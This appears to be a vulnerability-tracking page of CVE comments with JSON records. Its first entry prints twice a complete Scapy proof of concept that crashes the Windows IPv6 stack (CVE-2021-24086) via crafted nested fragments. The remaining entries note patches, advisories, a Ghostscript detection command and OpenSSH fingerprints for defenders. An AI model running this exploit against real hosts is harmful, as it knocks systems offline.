Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows (https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html).

This issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.

Proof of Concept

```python
import sys
import random

from scapy.all import *

FRAGMENT_SIZE = 0x400
LAYER4_FRAG_OFFSET = 0x8

NEXT_HEADER_IPV6_ROUTE = 43
NEXT_HEADER_IPV6_FRAG = 44
NEXT_HEADER_IPV6_ICMP = 58


def get_layer4():
    er = ICMPv6EchoRequest(data = "PoC for CVE-2021-24086")
    er.cksum = 0xa472

    return raw(er)


def get_inner_packet(target_addr):
    inner_frag_id = random.randint(0, 0xffffffff)
    print("**** inner_frag_id: 0x{:x}".format(inner_frag_id))
    raw_er = get_layer4()

    # 0x1ffa Routing headers == 0xffd0 bytes
    routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)
    routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))

    # First inner fragment header: offset=0, more=1
    FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)

    return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id


def send_last_inner_fragment(target_addr, inner_frag_id):

    raw_er = get_layer4()

    ip = IPv6(dst = target_addr)
    # Second (and last) inner fragment header: offset=1, more=0
    FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
    send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])


def trigger(target_addr):

    inner_packet, inner_frag_id = get_inner_packet(target_addr)

    ip = IPv6(dst = target_addr)
    hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)

    outer_frag_id = random.randint(0, 0xffffffff)

    fragmentable_part = []
    for i in range(len(inner_packet) // FRAGMENT_SIZE):
        fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])

    if len(inner_packet) % FRAGMENT_SIZE:
        fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])


    print("Preparing frags...")
    frag_offset = 0
    frags_to_send = []
    is_first = True
    for i in range(len(fragmentable_part)):
        if i == len(fragmentable_part) - 1:
            more = 0
        else:
            more = 1

        FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)

        blob = raw(FH/fragmentable_part[i])
        frag_offset += FRAGMENT_SIZE

        frags_to_send.append(ip/hopbyhop/blob)


    print("Sending {} frags...".format(len(frags_to_send)))
    for frag in frags_to_send:
        send(frag)


    print("Now sending the last inner fragment to trigger the bug...")
    send_last_inner_fragment(target_addr, inner_frag_id)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: cve-2021-24086.py <IPv6 addr>')
        sys.exit(1)
    trigger(sys.argv[1])
```


{
   uuid: "e58954bd-8b24-451b-9853-c16202937347",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086",
   description: "[Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows](https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html).\n\nThis issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.\n\n### Proof of Concept\n\n```python\nimport sys\nimport random\n\nfrom scapy.all import *\n\nFRAGMENT_SIZE = 0x400\nLAYER4_FRAG_OFFSET = 0x8\n\nNEXT_HEADER_IPV6_ROUTE = 43\nNEXT_HEADER_IPV6_FRAG = 44\nNEXT_HEADER_IPV6_ICMP = 58\n\n\ndef get_layer4():\n    er = ICMPv6EchoRequest(data = \"PoC for CVE-2021-24086\")\n    er.cksum = 0xa472\n\n    return raw(er)\n\n\ndef get_inner_packet(target_addr):\n    inner_frag_id = random.randint(0, 0xffffffff)\n    print(\"**** inner_frag_id: 0x{:x}\".format(inner_frag_id))\n    raw_er = get_layer4()\n\n    # 0x1ffa Routing headers == 0xffd0 bytes\n    routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)\n    routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))\n\n    # First inner fragment header: offset=0, more=1\n    FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)\n\n    return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id\n\n\ndef send_last_inner_fragment(target_addr, inner_frag_id):\n\n    raw_er = get_layer4()\n\n    ip = IPv6(dst = target_addr)\n    # Second (and last) inner fragment header: offset=1, more=0\n    FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)\n    send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])\n\n\ndef trigger(target_addr):\n\n    inner_packet, inner_frag_id = get_inner_packet(target_addr)\n\n    ip = IPv6(dst = target_addr)\n    hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)\n\n    outer_frag_id = random.randint(0, 0xffffffff)\n\n    fragmentable_part = []\n    for i in 
range(len(inner_packet) // FRAGMENT_SIZE):\n        fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])\n\n    if len(inner_packet) % FRAGMENT_SIZE:\n        fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])\n\n\n    print(\"Preparing frags...\")\n    frag_offset = 0\n    frags_to_send = []\n    is_first = True\n    for i in range(len(fragmentable_part)):\n        if i == len(fragmentable_part) - 1:\n            more = 0\n        else:\n            more = 1\n\n        FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)\n\n        blob = raw(FH/fragmentable_part[i])\n        frag_offset += FRAGMENT_SIZE\n\n        frags_to_send.append(ip/hopbyhop/blob)\n\n\n    print(\"Sending {} frags...\".format(len(frags_to_send)))\n    for frag in frags_to_send:\n        send(frag)\n\n\n    print(\"Now sending the last inner fragment to trigger the bug...\")\n    send_last_inner_fragment(target_addr, inner_frag_id)\n\n\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        print('Usage: cve-2021-24086.py <IPv6 addr>')\n        sys.exit(1)\n    trigger(sys.argv[1])\n\t```",
   description_format: "markdown",
   vulnerability: "CVE-2021-24086",
   creation_timestamp: "2024-08-28T09:53:22.190586+00:00",
   timestamp: "2024-08-30T12:27:27.331911+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2021-24086

More details about the update process on the AMD website on cve-2023-31315
7 months ago by Alexandre Dulaunoy

"AMD plans to release the Platform Initialization (PI) firmware version indicated below." The release schedule is mentioned there:

https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html

It also depends on the AGESA update process for some motherboards.


{
   uuid: "97b65c3a-146f-4c97-9b47-6dd15cb179ad",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "More details about the update process on the AMD website",
   description: "\"AMD plans to release the Platform Initialization (PI) firmware version indicated below. \" The release scheduled is mentioned there:\n\nhttps://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html\n\n\nIt also depends of the AGESA update process for some motherboards.",
   description_format: "markdown",
   vulnerability: "cve-2023-31315",
   creation_timestamp: "2024-08-22T07:48:09.609279+00:00",
   timestamp: "2024-08-22T07:59:33.336961+00:00",
   related_vulnerabilities: [],
}

cve-2023-31315

KB5025885: How to manage the Windows Boot Manager revocations for Secure Boot changes associated with CVE-2023-24932 on cve-2023-24932
8 months ago by Alexandre Dulaunoy


{
   uuid: "739d2f08-5639-4fd0-8e7f-526b3443ff54",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: " KB5025885: How to manage the Windows Boot Manager revocations for Secure Boot changes associated with CVE-2023-24932",
   description: "- [KB5025885: How to manage the Windows Boot Manager revocations for Secure Boot changes associated with CVE-2023-24932](https://support.microsoft.com/en-us/topic/kb5025885-how-to-manage-the-windows-boot-manager-revocations-for-secure-boot-changes-associated-with-cve-2023-24932-41a975df-beb2-40c1-99a3-b3ff139f832d)",
   description_format: "markdown",
   vulnerability: "CVE-2023-24932",
   creation_timestamp: "2024-08-02T21:39:30.732348+00:00",
   timestamp: "2024-08-02T21:39:30.732348+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: "https://support.microsoft.com/en-us/topic/kb5025885-how-to-manage-the-windows-boot-manager-revocations-for-secure-boot-changes-associated-with-cve-2023-24932-41a975df-beb2-40c1-99a3-b3ff139f832d",
      },
   ],
}

cve-2023-24932

Potential typo in the CVE summary on cve-2024-37085
8 months ago by Alexandre Dulaunoy

As mentioned in this toot (https://social.circl.lu/@fl@infosec.exchange/112876958526263355), it seems the group name is ESX Admins and not ESXi Admins.


{
   uuid: "501e7a04-3a1e-4ac4-b24b-6ff22b0b554d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Potential typo in the CVE summary",
   description: "As mentioned in [this toot](https://social.circl.lu/@fl@infosec.exchange/112876958526263355), it seems the group name is `ESX Admins` and not `ESXi Admins`. \n",
   description_format: "markdown",
   vulnerability: "CVE-2024-37085",
   creation_timestamp: "2024-08-01T20:57:15.091620+00:00",
   timestamp: "2024-08-01T20:57:15.091620+00:00",
   related_vulnerabilities: [],
}

cve-2024-37085

Timeline of reporting, publication/disclosure and fix on cve-2021-38578
8 months ago by Alexandre Dulaunoy

The timeline on https://bugzilla.tianocore.org/show_bug.cgi?id=3387 is interesting:

  • 2021-05-10 16:43 UTC - Bug reported by John Mathews
  • 2021-07-07 14:02:27 - Working patch mentioned by Vincent Zimmer (and also recommends the need of a CVE)
  • 2022-05-10 21:04:45 UTC "Blackduck has this CVE in their database so this CVE is being flagged for all edk2 products that are scanned."
  • 2022-06-14 05:52:10 UTC - Patch doesn't build.
  • 2022-11-04 - Patch merged in the repo https://github.com/tianocore/edk2/commit/cab1f02565d3b29081dd21afb074f35fdb4e1fd6

But the vulnerability was published 2022-03-03 21:53 or is the timeline incorrect?


{
   uuid: "f5ac1ede-8d1c-409b-b6bc-ce202e11fc90",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Timeline of reporting, publication/disclosure and fix",
   description: "The timeline on https://bugzilla.tianocore.org/show_bug.cgi?id=3387 is interesting:\n\n- 2021-05-10 16:43 UTC  - Bug reported by John Mathews \n-  2021-07-07 14:02:27  - Working patch mentioned by Vincent Zimmer  (and also recommends the need of a CVE)\n- 2022-05-10 21:04:45 UTC  \"Blackduck has this CVE in their database so this CVE is being flagged for all edk2 products that are scanned.\"\n- 2022-06-14 05:52:10 UTC - Patch doesn't build.\n- 2022-11-04 - Patch merged in the repo https://github.com/tianocore/edk2/commit/cab1f02565d3b29081dd21afb074f35fdb4e1fd6\n\nBut the vulnerability was published 2022-03-03 21:53 or is the timeline incorrect? \n",
   description_format: "markdown",
   vulnerability: "CVE-2021-38578",
   creation_timestamp: "2024-07-27T08:42:43.664278+00:00",
   timestamp: "2024-07-27T08:42:43.664278+00:00",
   related_vulnerabilities: [],
}

cve-2021-38578

Additional information from CSIRT/CERTs on cve-2024-20401
8 months ago by Alexandre Dulaunoy

Additional information from CSIRT/CERTs about Cisco Secure Email Gateway vulnerability


{
   uuid: "a309d024-2714-4a81-a425-60f83f6d5740",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Additional information from CSIRT/CERTs",
   description: "# Additional information from CSIRT/CERTs about Cisco Secure Email Gateway vulnerability\n\n- [IE](https://www.ncsc.gov.ie/pdfs/CiscoSecureEmailGateway_Vuln.pdf)\n- [FI](https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_18/2024)\n- [SE](https://www.cert.se/2024/07/bm24-003-kritisk-sarbarhet-i-cisco-secure-email-gateway.html)\n- [ES](https://www.incibe.es/incibe-cert/alerta-temprana/avisos/multiples-vulnerabilidades-en-productos-cisco-0)",
   description_format: "markdown",
   vulnerability: "CVE-2024-20401",
   creation_timestamp: "2024-07-19T07:16:54.446520+00:00",
   timestamp: "2024-07-19T07:19:41.157834+00:00",
   related_vulnerabilities: [],
}

cve-2024-20401

New intelligence shows that exploitation of this RCE vulnerability does not require authentication on cve-2023-6548
8 months ago by Alexandre Dulaunoy

Exploited Unauthenticated RCE Vulnerability CVE-2023-6548 in Citrix NetScaler ADC and NetScaler Gateway

New intelligence shows that exploitation of this RCE vulnerability does not require authentication

https://digital.nhs.uk/cyber-alerts/2024/cc-4525

The NHS England National Cyber Security Operations Centre (CSOC) is aware of intelligence provided by CrowdStrike that contrary to Citrix’s initial disclosure, the vulnerability known as CVE-2023-6548 does not require user privileges for exploitation. NHS England National CSOC now assesses CVE-2023-6548 as a critical vulnerability that can allow a remote, unauthenticated attacker to execute remote code on a vulnerable NetScaler Gateway or NetScaler ADC device.

CVE-2023-6548 has two different CVSSv3 scores attributed to it. The NIST National Vulnerability Database (NVD) has classified it as having a score of 8.8, while Citrix rates the vulnerability at 5.5. The weakness is Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway and could allow a remote, unauthenticated attacker with access to the management interface to execute arbitrary code.


{
   uuid: "dde1219a-14e2-47e0-9be7-64b42823c889",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "New intelligence shows that exploitation of this RCE vulnerability does not require authentication",
   description: "# Exploited Unauthenticated RCE Vulnerability CVE-2023-6548 in Citrix NetScaler ADC and NetScaler Gateway\n\nNew intelligence shows that exploitation of this RCE vulnerability does not require authentication\n\nhttps://digital.nhs.uk/cyber-alerts/2024/cc-4525\n\n\nThe NHS England National Cyber Security Operations Centre (CSOC) is aware of intelligence provided by CrowdStrike that contrary to Citrix’s initial disclosure, the vulnerability known as CVE-2023-6548 does not require user privileges for exploitation. NHS England National CSOC now assesses CVE-2023-6548 as a critical vulnerability that can allow a remote, unauthenticated attacker to execute remote code on a vulnerable NetScaler Gateway or NetScaler ADC device.\n\nCVE-2023-6548 has two different CVSSv3 scores attributed to it. The NIST National Vulnerability Database (NVD) has classified it as having a score of 8.8, while Citrix rates the vulnerability at 5.5. The weakness is Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway and could allow a remote, unauthenticated attacker with access to the management interface to execute arbitrary code.\n",
   description_format: "markdown",
   vulnerability: "CVE-2023-6548",
   creation_timestamp: "2024-07-17T15:49:25.225853+00:00",
   timestamp: "2024-07-17T15:49:25.225853+00:00",
   related_vulnerabilities: [],
}

cve-2023-6548

Detecting script in Postscript - if you run a vulnerable version of Ghostscript on cve-2024-29510
9 months ago by Alexandre Dulaunoy

Detecting script in Postscript - if you run a vulnerable version of Ghostscript

https://codeanlabs.com/wp-content/uploads/2024/06/CVE-2024-29510_testkit.ps

ghostscript -q -dNODISPLAY -dBATCH CVE-2024-29510_testkit.ps

For more details about the vulnerability https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

Reference to the patch: https://ghostscript.readthedocs.io/en/gs10.03.1/News.html?utm_source=ghostscript&utm_medium=website&utm_content=inline-link#Version10.03.1


{
   uuid: "5b42805e-e354-4697-945f-8c62633ca40f",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Detecting script in Postscript - if you run a vulnerable version of Ghostscript",
   description: "Detecting script in Postscript - if you run a vulnerable version of Ghostscript\n\nhttps://codeanlabs.com/wp-content/uploads/2024/06/CVE-2024-29510_testkit.ps\n\n~~~\nghostscript -q -dNODISPLAY -dBATCH CVE-2024-29510_testkit.ps\n~~~\n\nFor more details about the vulnerability [https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/](https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/)\n\nReference to the patch: [https://ghostscript.readthedocs.io/en/gs10.03.1/News.html?utm_source=ghostscript&utm_medium=website&utm_content=inline-link#Version10.03.1](https://ghostscript.readthedocs.io/en/gs10.03.1/News.html?utm_source=ghostscript&utm_medium=website&utm_content=inline-link#Version10.03.1)",
   description_format: "markdown",
   vulnerability: "CVE-2024-29510",
   creation_timestamp: "2024-07-10T07:33:50.157197+00:00",
   timestamp: "2024-07-10T07:33:50.157197+00:00",
   related_vulnerabilities: [],
}

cve-2024-29510

CVE-2024-6387 HASSH Fingerprints on cve-2024-6387
9 months ago by Alexandre Dulaunoy

CVE-2024-6387 HASSH Fingerprints

HASSH fingerprints for identifying OpenSSH servers potentially vulnerable to CVE-2024-6387 (regreSSHion).

The primary goal of this repository is to share the generated HASSH fingerprint database. The scripts use the Shodan API to compile a list of HASSH fingerprints for vulnerable OpenSSH versions. The generated database can be used to query Shodan or Censys to identify potentially vulnerable OpenSSH servers. The hasshdb.txt database can also be used with my Nmap NSE script available at hassh-utils.

from: https://github.com/0x4D31/cve-2024-6387_hassh


{
   uuid: "c83a5095-cd84-42e7-858b-3979ae75e818",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2024-6387 HASSH Fingerprints",
   description: "# CVE-2024-6387 HASSH Fingerprints\n\nHASSH fingerprints for identifying OpenSSH servers potentially vulnerable to CVE-2024-6387 (regreSSHion).\n\nThe primary goal of this repository is to share the generated HASSH fingerprint database. The scripts use the Shodan API to compile a list of HASSH fingerprints for vulnerable OpenSSH versions. The generated database can be used to query Shodan or Censys to identify potentially vulnerable OpenSSH servers. The hasshdb.txt database can also be used with my Nmap NSE script available at hassh-utils.\n\nfrom: [https://github.com/0x4D31/cve-2024-6387_hassh](https://github.com/0x4D31/cve-2024-6387_hassh)",
   description_format: "markdown",
   vulnerability: "cve-2024-6387",
   creation_timestamp: "2024-07-07T06:21:50.543465+00:00",
   timestamp: "2024-07-07T06:21:50.543465+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: "https://github.com/0x4D31/cve-2024-6387_hassh",
      },
   ],
}

cve-2024-6387

The most important part of this CSAF entry "Currently, no products are known to be affected. " on cisco-sa-openssh-rce-2024
9 months ago by Alexandre Dulaunoy

The most important part of this CSAF entry is "Currently, no products are known to be affected." It could be changed soon depending on the findings.


{
   uuid: "0f4da02a-c499-4a21-ae10-a36365226b09",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "The most important part of this CSAF entry \"Currently, no products are known to be affected. \"",
   description: "The most important part of this CSAF entry \"Currently, no products are known to be affected. \" It could be changed soon depending of the findings. ",
   description_format: "markdown",
   vulnerability: "cisco-sa-openssh-rce-2024",
   creation_timestamp: "2024-07-04T07:40:23.870739+00:00",
   timestamp: "2024-07-04T07:40:23.870739+00:00",
   related_vulnerabilities: [],
}

cisco-sa-openssh-rce-2024